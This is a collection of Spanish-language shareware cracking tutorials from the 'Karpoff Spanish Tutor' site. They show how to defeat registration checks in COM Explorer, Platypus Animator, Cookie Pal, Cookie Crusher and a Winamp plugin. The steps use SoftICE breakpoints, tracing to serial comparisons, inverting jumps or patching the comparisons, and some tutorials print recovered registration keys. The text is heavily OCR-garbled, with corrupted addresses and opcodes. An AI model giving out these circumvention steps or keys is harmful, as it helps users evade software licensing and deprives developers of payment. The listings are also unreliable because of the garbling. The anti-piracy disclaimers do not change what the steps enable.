ese fue el comienzo de la historia. fuí al sitio de los programadores y bajé este programa. lo corrí, y esto es lo que 
encontré. 


COM Explorer 1.6 E 


597 COM Explorer 1.6 
Copyright Y 1998 - 2000 4Developers LLC. 


http: ¿4wwwww 4developers.com 


Thank you for trying COM Explorer. 
Explore, Manage and Repair ActiveX Controls, DLL $: EXE Servers. 


Please press the 'Try 1'' button to continue... 


Trial Ends In 29 Days. 


If you have already ordered COM Explorer type in the user name and 
registration code and click the 'Unlock' button. 


User Name: Mana ma 
Registration Code: [q 23456789 


Read ME | Order By Mail Order Now Try lt | 


puse mis datos, oprimí unlock y como respuesta obtuve lo siguiente 


UNREGISTERED User 


Please re-enter the registration code and user name you have legaly obtained from 


(N The registration information you have entered could not be validated. 
4Developers. 


If you have not registered yet you can click one of the buttons below to see how to 
register COM Explorer. 
For help e-mail support(MAdevelopers.com 


todo igual que antes. si te digo que no se puede crackear con el método anterior no me vas a creer ( yo tampoco lo creía ). 


fuí al smartcheck, cargue el ejecutable, llené con mis datos, acepté y nada. pulsé pad 


Show All Events 


y ....nada 


extraño, no. lo primero que pensé fue que como cuesta $150, la protección era más eleborada. nada de eso. la respuesta 
era muy simple, este programa (de ventanas exactamente iguales al anterior y bajado del mismo sitio ) a diferencia del 
anterior no estaba hecho en visual basic. y ahora que ???....... fácil a olvidarse del smartcheck y a trabajar con soft-ice. esta 
vez nos ayudaremos con el 'w32dsm89' (no como en el anterior que usamos el 'w32dsm89vb”) 


una diferencia entre el listado muerto que nos da el w32dsm89 y el vivito y coleando del soft-ice. en el listado muerto 
vemos todas las instrucciones que ejecutará o no el procesador y además tenemos las string-ref que son una gran ayuda. 
pero, por ejemplo, ante un salto condicionado (je, jne, etc) el único que nos dirá que camino va a tomar es el soft-ice. 


corremos el comexplorer, aparece la ventana de registración, ponemos nuestros datos (como en el gráfico de arriba) . 
presionamos control-d , ponemos un bpxhmemcpy y pulsamos f3 para volver a windows. poner un breakpoint en 
hmemcpy (mi favorito) nos hará trabajar un poco más, pero podremos ir viendo que es lo que realiza el programa. hecho 
esto presionamos unlock y entramos en el soft-ice. borramos el breakpoint con bc* para que no nos moleste. estamos en 
algún lugar del kernel (como ya sabemos esto no nos interesa) vamos pulsando f12 (para viajar de ret en ret) pasaremos 
por el user (que tampoco nos interesa) llegaremos al comexplorer!text pero seguile sacudiendo a f12. volverás a pasar por 
el kernel y el user y te detendrás justo cuando vuelvas a alcanzar el comexplorer!text ( que como lo sé, porque ahora sí, 
de seguir pulsando f12 aparecerá la ventana de error ) de aquí en más iremos pulsando £10 , para ir de instrucción en 
instrucción. lo que vemos ahora no es un listado muerto sino el camino que va tomando el soft-ice: 


XXxx : 00429113 jmp 00429207 

Xxxx : 00429207 ret 

XXXx : 00408f0c push 000000ff 

Xxxx : 00408f11 push 00458e78 

XXxx : 00408f16 lea ecx , dword ptr (esi+0000046c) 
XxXxx : 00408flc call 004291db 

XXxx : 00408£21 push 00458d78 


si tipeas d00458d78 verás tus datos. esto quiere decir que estamos cerca. sigue pulsando f10 (unas veces más) y verás lo 
siguiente: 


XXxx : 00408148 call 0042582d 


XXxx : 00408f4b test bl, bl 


XXxx : 00408f4f Jz 00408160 


XXxx : 00408160 call 00408ac0 
XXxx : 00408165 test eax, eax 
XXxx : 00408167 Jz 00409018 


el soft-ice nos informa que este último salto se va a efectuar. de ser así estamos en problemas. como nos damos cuenta? 
interpretando el listado de w32dsm89 o bien invirtiendo el salto con 'r fl z' y viendo donde vamos a parar oprimiendo f5. 
si hacemos esto último, daremos con el mensaje de felicitación por habernos registrado. como sabemos que es ese 
salto y noel anterior? pues lo mismo. checkeando el listado o invirtiendo el flag. 


repasemos lo que hemos hecho hasta ahora. desde que entramos en el soft-ice, fuimos trazando primero con f12 hasta 
llegar a comexplorer!text por segunda vez (unas 20 veces en total) . a partir de allí con £10 hasta xxxx:00408f67.fuimos 
capaces de encontrar los datos por nosotros ingresados. en ningún momento nos apareció el mensaje de error, y sí 
encontramos un call, seguido de un test, seguido de un jz , al que si le cambiamos el flag nos conduce al éxito, mientras 
que si lo dejamos igual al fracaso. que quiere decir todo esto?????7799?.......... exacto!!!....... que la llamada a la rutina de 
comprobación se encuentra en el call 00408ac0. 


hacemos lo mismo que antes (o directamente ponemos un bpx00408f60) y al llegar al call 00408ac0 en lugar de oprimir 
f10 pulsamos f8 para meternos dentro del llamado. una vez allí seguimos trazando con f10 y vas a ir checkeando que hay 
en los registros . vas a ir pasando por una serie de loop's e irás viendo como se forma tu serial. cuando llegues a 


XXxx : 00408c33 call 004259la 
XxXxx : 00408c38 lea ecx, dword ptr (esp+14) ------ aquí pulsa decx 


justo a la salida del call cuando el soft-ice esta en la posición xxxx:00408c38 se termina de generar nuestro número. si allí 
pulsas decx lo verás en la ventana de datos del soft-ice (debes detenerte justo en 00408c38 porque en seguida se modifica 
el registro ecx ) a partir de allí si sigues trazando volverás a ver el serial en algún registro ya que empiezan las 
comparaciones ) 


todo lo anterior se puede hacer cargando la víctima en el simbol loader del soft-ice y poniendo un breakpoint en 
bpx00408c38. pero es interesante ver como se genera el serial paso a paso (estamos aprendiendo no buscando seriales). en 
mi caso dió '6769-x6lqfr2' 


bueno, llegamos a un final felíz. este tutorial fue más pesado que los anteriores, pero en el futuro nos será de utilidad, ya 
que no seguimos recetas mágicas o preestablecidas sino que paso a paso analizamos que hace el procesador. si después de 
todo esto todavía te quedaron ganas, podés probar con el cookie-terminator 1.1 de los mismos programadores ( léase 
tarea para el hogar). tiene una protección muy parecida a este último, (ojo puse muy parecida, no exactamente igual) con 
las mismas ganas de aprender e igual paciencia podrás resoverlo. seguramente habrá también algunos con la protección del 
"talking e-mail' 


por dudas o consultas comunicate a http://yerbamatear O yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


mportante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware no 
tendríamos con que entretenernos. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Descripcion: 
Dificultad: 
DOWNLOAD : 


Herramientas: 


Karpoff Spanish Tutor 


Platyplus Animator v5.2, CP Setup v3.6 


Serial, Limitación de tiempo y funciones. 
Aplicación 
Facileta, ma non troppo. 


http: //www.c-point.com 


Soft-Ice 


Yerba Mate 10/10/2000 


introduccion 


platypus es una aplicación que permite la creación de videos en formato avi, extraer imágenes de videos, convertir 
avi en mpeg, etc. elegí este programa porque la protección es distinta a las que hemos visto hasta ahora. cp setup es 
de los mismos programadores, te permite crear instaladores para tus aplicaciones. la gente de e-point en general, 
presenta en su página aplicaciones interesantes. 


instalá el programa, correlo, clickeá en help, register y completá con tus datos. hecho esto estaremos ante esta pantalla: 


Registration E 


Platypus Animator is shareware. Registration is U/S$20 only. 
which entitles you to the latest version and removes the 
Platypus logo from the output. 


E Point Pty Ltd 

21 Willlamson Road, Para Hills 5096, Australia 
Tel: +618 8263 3623 Fax: +518 8396 1477 
Web: http: 44. c-point. com 


Email: c-pointí3c-point, com 
On-line orders 
User name: [Yerba Mate 
User ID: [12345674 Cancel | 


hasta ahí todo normal, el problema viene cuando le das al botón en | por más que le sacudas con violencia no pasa 
nada. al principio pensé que tenía que ver con el largo del número de serie, pero no. entonces con el largo del nombre, 
tampoco. yo no se si era mi imaginación o el pato cada vez se sonreía con más ganas ;-). 


seguramente alguna vez te has topado con un programa así, o talvéz con un programa que ni siquiera tiene un botón de ok. 
estos programas entran dentro de un 'loop' contínuo comparando el name y serial . la única forma de salir del loop es con el 
serial correcto o bien con el botón de cancel. usaremos soft-ice. como no sale cartel de serial inválido no podremos usar 'bpx 
messageboxa' ni tampoco 'bpx getdlgitemtexta'. y entonces que usamos?????... pues sí 'bpx hmemcpy' pero esta vez no solo 
para recorrer toda la protección y practicar asembler, si no porque no nos queda otra. hablando de practicar asembler, ya es 
hora de que te imprimas algún curso de asembler (o todos) y la tabla de caracteres ascii, y los leas y releas mientras vas en el 
subte, tren, colectivo, etc. si vos manejas no lo intentes, puede ser peligroso ;-). 


a lo nuestro, control-d, bpxhmemcpy, £f5 y oprimimos el botón de ok. entramos al soft-ice (borremos el breakpoint con bc* 
para que no nos moleste). estamos en el kernel, vamos oprimiendo f12 hasta llegar al avimaker!text (unas10 veces). para que 
no te pierdas, aquí es donde apareces: 


00487192 mov ecx, (ebp+10) 


si le sacudís unas 28 veces al f10 esto es lo que verás. uso el texto del w32dsm89 para no cometer errores en el tipeado (léase 
soy un vago) : 


00425576 8B4C240C mov ecx, dword ptr [esp+0C] Aqui se pone Yerba Mate en el ECX 
200425574 8D44242C lea eax, dword ptr [esp+2C] 

:0042557E 50 push eax 

:0042557F 51 push ecx 

:00425580 C0744247000000000 mov [esp+?0], 00000000 

:00425588 ESE35F0000 call 0042B570 

:0042558D SBES7B0000000 mow eax, dword ptr [edi+000000B0] Aqui 12345678 

200425593 8D742420 lea esi, dword ptr [esp+2C] Aqui  LKHICON 


para poder leer lo que hay en los registros, debes pasarte con el soft-ice. por ejemplo, para leer tu nombre en el ecx debes 
hacer que el soft-ice se detenga en 0042557a y tipear decx ( ya se que lo sabías fue un simple repaso ). todo lo anterior nos 
indica que el éxito está próximo. leemos nuestro nombre, nuestro serial y algo extraño. no se, pinta de serial correcto no tiene 
pero quién sabe. avancemos un poco más. inmediatamente debajo de lo anterior tenemos esto: 


: 00425597 8A10 mov dl, byte ptr [eax] 31=1 

00425599 SACA mov cl, dl 

0042559B 3116 camp dl, byte ptr [esil 4c=L 

:0042559D 751€ ¿ne 004255BB rfiz para que no salle 
:0042559F 84C9 test cl, el Checkea si hay mas numeros 
:004255A1 7414 44 004255B7 

:00425543 SAS001 mov dl, byte ptr [eax+01] 32=2 

: 00425546 SACA mov cl, dl 

:004255A8 3AS601 cap dl, byte per [esi+01) 4b=K 

:004255AB 750E jne 004255BB rfiz para que no salte 
:004255AD 83C002 add eax, 00000002 

:004255B0 830602 add esi, 00000002 

:004255B3 84039 test cl, cl Checkea si hay mas números 


:004255BS 75E( jne 00425597 


Q 


este sería un buen momento para tener a mano el código ascii y el apunte de asembler. detengamos el soft-ice justo en el 
primer renglón. en la ventana que contiene a los registros (en su parte inferior derecha) vemos que el valor que se va a pasar al 
dl es 31.el procesador solo entiende hexadecimal. si te fijas en la tabla 31(en hexadecimal) significa 1 (en ascii). si no tenés 
una tabla a mano, hacé '?31' en el soft-ice.que de donde salió este '1' 22? de nuestro falso serial. luego lo compara con 4ec que 
significa l ,esta 1 solo puede provenir de un lugar. despues compara '31' con '4c', como evidentemente son distintos, 
pulsaremos 'r fl z' para invertir el salto y poder ver que sigue haciendo. vemos que en 00425543 pone en dl el número 32 (que 
corresponde al 2) para luego compararlo con 4b (que corresponde a k). es evidente que está comparando 12345678 con 
Ihkim que en mi caso es el serial correcto. algo más, en alguna de las 6 comparaciones no inviertas el salto. así vemos que 
continúa haciendo. 


:004255F1 8B542400 mov edx, dword ptr [esp+0C] Yerba MatePLV20 


pasarás por un jump que te enviará más adelante y en la posición 004255f1 volverás a ver tu nombre con algún agregado. 
presionamos algunas £10's más y tenemos esto. 


:00425600 8B27B0000000 mov eax, dword ptr [edi+000000B0] 12345678 
200425606 8D74242C lea esi, dvord ptr [esp+2C] CK5Imy 

' 

:00425604 8410 mov dl, byte ptr [eax] 31=1 

:0042560C SACA mov cl, dl 

:0042560E 3416 cmp dl, byte ptr [esi] 43=C 

:00425610 7510 jne 0042562E ene 

:00425612 8409 test cl, el se fija si hay más números 
:00425614 7414 je 00425624 

:00425616 245001 mov dl, byte ptr [eax+01] 32=2 

:00425619 SACA mov cl, dl 

:0042561B 345601 cmp dl, byte ptr [esi+01] 4b=K 

:0042561E 750E jne 0042562E rflz 

:00425620 830002 add eax, 00000002 

:00425623 830602 add esi, 00000002 

:00425626 84C9 fest al, Vel se fija si hay más números 
:00425628 ?75E0 jne 00425604 


te suena todo esto. seguro que sí, vuelve a hacer lo mismo que antes pero para 'ck5iGj' cualquiera de los dos seriales 
funciona perfectamente. te acordás cuando crackeamos el 'calendar builder' nos pasó lo mismo, o talvez tenga que ver con 
'personal license' o 'site license', no lo sé te lo dejo para que lo investigues. una cosa más, cuando ingresas el serial correcto y te 
agradece por haberlo registrado, crea en la carpeta donde lo tenes instalado un archivo '.bin'. para que en la ventana 'help' 
desaparezca la opción 'register' tenes que cerrar el programa y abrirlo nuevamente así lo puede leer. si lo abris con el block de 
notas verás en él tus datos. 


para que nos sirvió todo lo visto hasta acá. ¿¿¿para crackear esta aplicación???. !!!!M!nnnnnnno000000000!!!!!! si 
contestaste que sí perdiste mucho tiempo, hubieras buscado el serial en la web. nos sirvió para aprender un poco más sobre 
esquemas de protección. no te quedes solamente con lo que hemos hecho. borra el archivo '.bin' para volver a estar 
'unregistered' introducí tus datos nuevamente, trazá instrucción por instrucción, metete en los call con f8, fijate como pasa de 
minúsculas a mayúsculas, en fín tratá de entender como funciona. sé que no es fácil pero te servirá en futuros programas. 


ahora te toca a vos.....si entendiste lo anterior, vas a poder registrar 'cp setup v3.6' que bajarás del mimo sitio. en mi caso la 
clave fue mki¡On y si se te complica de demasiado busca cerca de 0041295b que por ahí anda la cosa. en general creo que 
todas las aplicaciones responden a protecciones similares a la aquí expuesta ( yo probé con tres y después me aburrí, ya que 
eran todas iguales ). 


en un destello de lucidez, le puse número a este tutorial. si te pareció dificil o no muy claro deberías leer los anteriores en este 
orden: 


tutorial 1___________k¿jump over-matris 
y calendar builder-visual business card-visual labels 
OE imd cd player-infotel 
4 unos cuantos 
a talking e-mail - comexplorer 


por dudas o consultas comunicate a http://yerbamatear Oyahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna propiedad. 
si vas a usar este programa debes comprarlo. sino fuera por los programadores de shareware no tendríamos con 
que entretenernos. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programas: |[Cookie Pal v1.2b - Cookie Crusher v2.6 


http://www.kburra.com , http://www.thelimitsoft.com 


INTRODUCCION 


Bueno, vamos a ver como se consigue un Número de Serie correcto para estos programas. Aunque de 
empresas diferentes, los dos usan el mismo y sencillo método para calcular el Número de Serie que 
corresponde a nuestro nombre. No es que tenga mucha dificultad, pero tiene su gracia ver como se complican 
la vida algunos programadores intentando ocultar sus manejos para ponernos las cosas "dificiles", en fin... 


Me gustaría citar algo que he leido hace poco: 


"La seguridad es equivalente a una puerta muy sólida, pero con la llave escondida cerca...'' 


Vamos a ver si encontramos todo el llavero... 


cookie pal v1.2b 


instalando 


vamos alla, setup, ventana de welcome, ventana de licencia, y ...ventana de registro. rellenamos los datos con lo de 
siempre: 


Registration ES | 


If you have already purchased Cookie Pal, please enter 
your name and registration number EXACTLY as they 
appear on pour registration notice, 


(O 
pe 


l 


o 
o 


lfyou are evaluating Cookie Pal, then just leave these 
BLANK and click Next to begin your trial period. 


Í 


> RO Y 
Di 


58 
elo 


Name [ARKANIAN 
Registration Number [1224567890 


¿<< Back | [_nem>> ] Cancel | 


eso del exactly de ahí arriba parece de lo más amenazador, suena a número supercomplicado con mayúsculas, 
minúsculas, caracteres especiales y todo lo demás..., nada más lejos de la realidad, como veremos más adelante. no hay 
que fiarse de las apariencias. 


una vez aquí, ctrl+d y nos vamos a ver que nos cuenta softice... 
softice 
lo primero es lo primero: dex 0 eax, dex 1 es:edi, dex 2 ds:esi, con la ventana n* 3 ya veremos que hacemos. 


metemos un task para ver las tareas activas y encontramos dos que se refieren a nuestro programa: 


+ Cpalinst 
. cplsetup 


vamos a empezar con cpalinst que por algo aparece la primera. pues le hacemos un hwnd cpalinst para ver que 
información sacamos de las ventanas. (no voy a poner la información que devuelve el comando, es muy trabajoso). 


esta parece la buena, tres buttons y dos edit, que es lo que tenemos arriba, en la ventana de registro, así que vamos a 
meter un breakpoint a la dirección del window handle del primer edit, que en mi caso es 048c. así que, bmsg 048c 
wm_gettext. 


hacemos un crtl+d, volvemos a la ventana de registro, le damos al next y el estupendo softice salta en 
user!bozosliveshere, (siempre me he preguntado quien coño será el tal bozos y a quien le importa que viva ahí), 


seguimos con £12 unas cuantas veces hasta aparecer en epalinst!.text +375e. y en la dirección 00404760 limpiamos el 
break con un be * y una vez aquí vamos trazando con el £10 hasta legar a: 


:00404740 8d85fcfeffff lea eax, dword ptr [ebp+fffffefc] -> nuestro número txungo en eax. 
:00404746 50 push eax 
:004047a7 8d857cffffff lea eax, dword ptr [ebp+ffffff7c] -> nuestro nombre en eax. 


:004047ad 50 push eax 

:004047ae Ofbf862c010000 movsx eax, word ptr [esi+0000012c] 
:004047b5 50 push eax 

:004047b6 668b862a010000 mov ax, word ptr [esi+0000012a] 
:004047bd 50 push eax 

:004047be eS5b250000 call 00406d1e -> investigemos esta llamada. 
:004047c3 66f7d8 neg ax 

:004047c6 1bc0 sbb eax, eax 

:004047c8 £7d8 neg eax 

:004047ca 3ac3 cmp al, bl 

:004047cc 740b je 00404749 -> ojo con este, que nos saca fuera. 
:004047ce 395dfc cmp dword ptr [ebp-04], ebx 

:004047d1 7406 je 004047d9 -> y este también. 

:004047d3 c6ó462801 mov [esi+28], 01 

:004047d7 ebOf ¡mp 004047e8 


call 00406d1e 


dentro de esta llamada observamos fascinados como el nombre va sufriendo una serie de transformaciones de lo más 
"in". de arkanian pasa a arkanian y de ahí a este engrendro, naariknaankiraan. (todo esto se ve dandole caña al 
£10), llegaremos al código de abajo después de un rato: 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00406d76(u) 


:00406d8e £f£7508 push [ebp+08] 

:00406d91 es2cfeffff call 004069c2 ->aquí manipula el engendro. 
:00406d96 894514 mov dword ptr [ebp+14], eax -> sorpresa, eax = ebx = edx =xxXxXXXXXX. 
:00406d99 8d45d0 lea eax, dword ptr [ebp-30] 

:00406d9c 6a2d push 0000002d 

:00406d9e 50 push eax 

:00406d9f e808ccffff call 0O4039ac 

:00406da4 59 pop ecx 

:00406da5 3bc6 cmp eax, esi 

:00406da7 59 pop ecx 

:00406da8 89450c mov dword ptr [ebp+0c], eax 

:00406dab 89751c mov dword ptr [ebp+1c], esi 

:00406dae 74 1e je O0406dce -> saltamos. 


no voy a entrar en el rollo macabeo de explicar detalladamente todo lo que pasa en call 0040692, pero os diré que 
coge valor por valor del engendro en que ha convertido nuestro nombre y junto con un valor fijo que planta en esi 
(5034446801) lo empieza a manipular en un largo bucle de instrucciones que se repite 30 veces (1eh , para los 
puristas). 


una vez que retornamos de la llamada, observamos que eax, ebx y edx tienen el mismo valor. este valor es almacenado 
en ebp+14 y luego utilizado en el siguiente código para establecer la comparación entre el serial bueno y el serial 
txungo: 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
1:00406dae(c), :00406dc6(c) 


:00406dce 6a0a push 0000000a 

:00406dd0 8d45d0 lea eax, dword ptr [ebp-30] 

:00406dd3 5f pop edi 

:00406dd4 57 push edi 

:00406dd5 56 push esi 

:00406dd6 50 push eax 

:00406dd7 esf2cbffff call 004039ce ->aquí manipula nuestro número txungo. 

:00406ddc 83c40c add esp, 0ODO0000c 

:00406ddf 3b4514 cmp eax, dword ptr [ebp+14] -> eax= 4996022 y [ebp+14] = xxxxxxxx. 
:00406de2 018561010000 jne 00406149 -> como no son iguales, ya sabes a donde vamos... 
:00406de8 8b450c mov eax, dword ptr [ebp+0c] 


call 004039ce 


afortunadamente la manipulación de nuestro número es corta (solo consta de 10 caracteres) y la secuencia del bucle se 
reduce a ocho instrucciones: 


* referenced by a call at addresses: 

1:00405a32 , :00406dd7 , :00406e19 , :00406e41 , :00406e91 
|:00406ea1 

| 


:004039ce 8b542404 mov edx, dword ptr [esp+04] -> nuestro serial txungo en edx 
:004039d2 33c0 xor eax, eax -> eax=0 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:004039e5(u) 


:004039d4 820a mov cl, byte ptr [edx] -> los caracteres del serial a cl. 
:004039d6 84c9 test cl, cl -> testea el valor de cl. 

:004039d8 740d je 00403987 ->salta al ret cuando no haya más caracteres. 
:004039da Ofbec9 movsx ecx, cl 

:004039dd 8d0480 lea eax, dword ptr [eax+4*eax] 

:004039€0 42 inc edx 

:004039e1 8d4441d0 lea eax, dword ptr [ecx+2*eax-30] 

:004039e5 ebed jmp 004039d4 -> sigue el bucle.. 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:004039d8(c) 


| 
:004039e7 c3 ret -> volvemos a 00406ddc. 


observa detenidamente el código en 004039da y las tres instrucciones siguientes,. ¿que hacen esta secuencia de 
instrucciones?. simplemente convierten a valor hexadecimal el serial de prueba que hemos puesto y que muestra edx. 


conclusiones 


cuando retornamos de la llamada, eax = 49960242, este es el valor en hexadecimal de 1234567890, no hay más que poner 
el siguiente comando, ?eax, en softice para ver que estamos en lo cierto. después se establece la comparación con el 
valor almacenado en ebp+14, que es el correspondiente a nuestro nombre y, si no son iguales (que no lo son) el salto 
siguiente en :00406de jne 00406f49, nos manda fuera. 


por lo tanto la conclusión es obvia, el valor de ebp+14 es el valor en hexadecimal del número de serie bueno 
correspondiente a nuestro nombre. cogemos la calculadora del windows y hacemos la adecuada transformación. 


solo queda registarse con el número bueno que acabamos de obtener para ver esto de aquí abajo cuando pinchamos en 
el botón about una vez finalizada la instalación: 


About Cookie Pal E 
Cookie Pal Version 1.2b 
Copyright O 1997-1998 Kookaburra Software 
¿All Rights Reserved > 


This product is registered to: 
ARKANIAN 

Registration Code ¡ JE, JE, JE! 
Single Copy License 


cookie crusher v2.6 
instalando 


realizamos la instalación y vemos que no hay ventana de registro, así que suponemos que el programa se inicia como 
shareware y que la ventana de registro estará en alguna opción del tipo register, licence o en el menu de about. 


regedit 
una vez instalado y cuando lo hemos ejecutado una vez, vamos a echar un vistazo por el registro del windows. a veces 


encuentras cosas sorprendentes, si no leete el estupendo tutorial de gádix sobre macromedia flash 4 que encontrarás en 
este mismo sitio. 


ejecutamos regedit y en hkey_current_user/software/the limit software/cookie erusher encontramos estas interesantes claves: 


e license number ''00000000"" 
e licensee ''unregistered 30-day evaluation copy only"' 


¡una estupenda pista!, el serial correcto consta de 8 caracteres, ¿el programa manipula el nombre y lo transforma a 
valor hexadecimal?... pues aunque parezca mentira eso es exactamente lo que hace. 


iniciamos cookie crusher, vamos al botón de about y de ahí al de license now y rellenamos con lo de siempre: 


Cookie Crusher Registration 


License Name: 
[ARKANIAN 


License Number: 


fi 234567890 
_ Lance! | 


y te preguntarás ¿porqué diez caracteres si sabemos que son ocho?, pues porque el valor hexadecimal de 1234567890 
es 499602d2, (como hemos visto con el programa anterior), porque me lo se de memoria y cuando aparece este valor 
en cualquier registro del softice pues ya se de que va la cosa. 


así que ctrl+d y vamos con softice. 
softice 


seguimos el mismo prodecimiento que con el programa anterior y desgraciadamente vemos que no funciona. el bmsg 
0c64 wm_gettext al primer edit no salta. que curioso, ponemos varios bpx de los habituales y el único que salta es 
getwindowtexta, pero no conseguimos nada. un poco de intuición y suerte es lo que hace falta, así que vamos a ver si 
suena la flauta. tecleamos un bpx hmemepy ... y softice salta de nuevo maravillosamente. 


ahora podriamos utilizar el comando page con el valor que muestra es:edi (después del repz movsd) y luego un bpr de rw 
al selector 30 para salir disparados al código real del programa pero prefiero, en beneficio de la sencillez, darle caña al 
£12 hasta salir a cookie!.text +0001d013, de ahí con f10 vamos a pasar por unos cuantos ref hasta aterrizar aquí: 


:00410£3d e8aa7b0300 call 00448aec 
:00410f42 33f6 xor esi, esi ->aterrizamos aquí. 
:00410f44 8bc3 mov eax, ebx ->nuestro nombre en eax (ojo, ¿falta el último caracter?). 


:00410f48 eb0a ¡mp 00410154 ->saltando... 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00410f48(u) 


:00410f54 8b4da0 mov ecx, dword ptr [ebp-60] -> aquí. 

:00410f57 8b81c4020000 mov eax, dword ptr [ecx+000002c4] 

:00410f5d eS667b0300 call 00448ac8 -> manipula el nombre. 

:00410162 3bf0 cmp esi, eax -> eax = 8 caracteres. 

:00410f64 7ce4 jl 00410f4a -> bucle atras hasta que esi = eax = 8. 

:00410f66 69d7c1dc0100 imul edx, edi, 0001dcc1-> ¡lo que son las matemáticas!. 
:00410f6c 8947 mov edi, edx -> el número que buscamos en edi. 

:00410f6e 83ff01 cmp edi, 00000001 

:00410f71 7d05 ¡ge 00410f78 -> salto... 


oia sa más código 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00410fa0(u) 


:00410fa7 8d45f8 lea eax, dword ptr [ebp-08] 

:00410faa es01 150800 call 004924b0 

:00410faf ff45c0 inc [ebp-40] 

:00410fb2 8$b00 mov eax, dword ptr [eax] -> nuestro número de prueba en eax. 
:00410fb4 eS33a40600 call 0047b3ec -> manipula el número y cuando retorna... 
:00410fb9 Sbd8 mov ebx, eax -> eax = ebx = 499602d2. 
O más código 

004 10fe1 8bcf mov ecx, edi 

:00410fe3 8bc1 mov eax, ecx 

:00410fe5 99 cdq 

:00410fe6 33c2 xor eax, edx 

:00410fe8 2bc2 sub eax, edx 

:00410fea 3bd8 cmp ebx, eax -> comparación entre el serial bueno y el malo. 
:00410fec 0f85eb010000 jne 004111dd -> como no son iguales, nos manda fuera... 
:00410ff2 66c745b42c00 mov [ebp-4c], 002c 


solo queda hacer un ?eax para ver de nuevo que 499602d2 hexadecimal es 1234567890 en decimal y con un ?ebx 
obtenemos el número de serie correcto. con este número nos registramos adecuadamente como puedes comprobar: 


About Cookie Crusher... 


(y. Cookie Crusher v2.6 
AY> Copyright $ 1337-2000 The Limit Software, Inc. All Rights Reserved. 


This product is licensed to: 


a ARKANIAN Update Check 
Serial Number: ¡JE, JE, JE ! 


] Web Site | 
This product is licensed for use on only one computer 
unless otherwise specified above, 


apunte final 


¿como crackear estas "protecciones"?, puedes probar a invertir el salto después de la comparación, verás que funciona 
sin ningún problema. mejor todavía es cambiar el código de las comparaciones de manera que el serial se compare 
consigo mismo. 


otra cosa que nunca falla es comprar el programa, si te gusta, y ser un usuario debidamente autorizado. 
si esperabas encontar algún serial number correcto, siento decepcionarte, ya sabes, quien quiera peces... 
de todas formas, alguna vez tendrás que aprender a pescar..., ¿no? 
¡je,je je ! 
"if you give a man a crack 
he"!l be hungry again tomorrow, 


but if you teach him how to crack, 
he'll never be hungry again.” 


+orc 


dedicado a toda esa gente que está hambrienta de conocimiento. 


karpoff spanish tutor: página dedicada a la divulgación de información en castellano, sobre 


ingeniería inversa y programación. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: [NiceMC Media Plugin v1.7 | Media NiceMC Media Plugin v1.7... vl1.?” 


Serial, y una nag, muy molestosa, y tan grande que no me deja 
ver mis videos de música favoritos ademas si lo mueves a un 
extremo aparece otro igual, y siguen Jeringando, al 4 tema deja 
de responder ya no reproduce nada. 


PROTECCION: 


Este plugin no solo hace que reproduzcamos solo música sino 
también videos desde .mpg hasta archivos *.dat,*.vob que son los 
archivos para DVD y como dije muchos otros más. 


También pueden verse imágenes en forma de diapositivas. 


Dificultad: Principiante 


DOWNLOAD : http: //www.nicemcmedia.com 


SoftICE cualquier versión yo utilizo la ver. 3.25 
W32Dasm Ver 8.93 (Opcional) 
Hworks32 editor hexadecimal (Opcional) 


Herramientas: 


INTRODUCCION 


Bueno después de leerme todos los tutoriales que me baje de la pagina de KARPOFF , 
Cracker al que no tengo el gusto de conocer, y a sus muchos amigos que tiene por ahí; 
también Crackers especializados; a quienes agradezco por los conocimientos que me 
transmitieron, y que ahora también yo aporto con este granito de arena. 


Espero que les sirva. 


AL ATAKE 


ahora es el momento de iniciar el plugin, ejecuten winamp, y les aparecerá una nag, con 6 
botones, el 1% para la registración (enter registration code), y el quinto para continuar 
sin registrarse (i agree). y una nota que nos dice que este mensaje desaparecerá cuando nos 
registremos. 


esta bien, presionemos el botón de registro (enter registration code), aparece una ventana 
con el nombre de "registration info", coloquen cualquier dato a name y key code y presionen 
el botón "ok". 


en mi caso coloque: 


name: fancy <- anota esto en un papel tal como esta, pero lo que tu coloques 


key code: 123456789 


vemos que al presionar aparece un mensaje que dice "wrong code" con el botón aceptar. si 
presionamos aceptar desaparece la ventana de mensaje. 


conclusiones: 


la ventana parece del tipo <messageboxa>, así que podemos ir softice a comprobarlo, pero 
podemos intentar con el w32dasm buscado el mensaje que nos mostró al introducir el registro 


falso. veamos... vamos, antes cierren winamp talvez les aparezca un mensaje de error, en mi 
maquina aparece!..., pero después que lo crackee ya nunca más volvió a salir. no se 
preocupen. 


ya esta cargado nuestro w32dasm con winamp, ya saben verdad: 


1% click disassembler 


2% clic open file to disassembler 


3% cargar el archivo in_nicemc.dll 


4% esperar, todo depende de la velocidad de su pc. 


5% guardar el archivo como proyecto, lo utilizaremos más tarde, y asi después de reiniciar, 
se Cargara este archivo más rápido casi instantáneamente, esto para evitar esperando, y 
sobre todo para abrir rápidamente cualquier otro archivo. esto se hace de la siguiente 
manera: 


clic disassembler 


clic save disassembler text file and create project file. 


escoger el directorio donde guardarlo, y clic en "aceptar", el nombre se dara por defecto 
alt. 


6% buscar el mensaje que vimos en la ventana. "wrong code", en string data references o con 
find text, pero ya saben primero lo primero. 


7% me hierve la cabeza, por no haberlo encontrado. 


8% no nos queda otra que utilizar el súper softice, también pueden utilizar trw2000, muy 
parecido al softice pero no necesitamos reiniciar a fancy (así se llama mi maquina "mundo de 
fantasías") o su pc. 


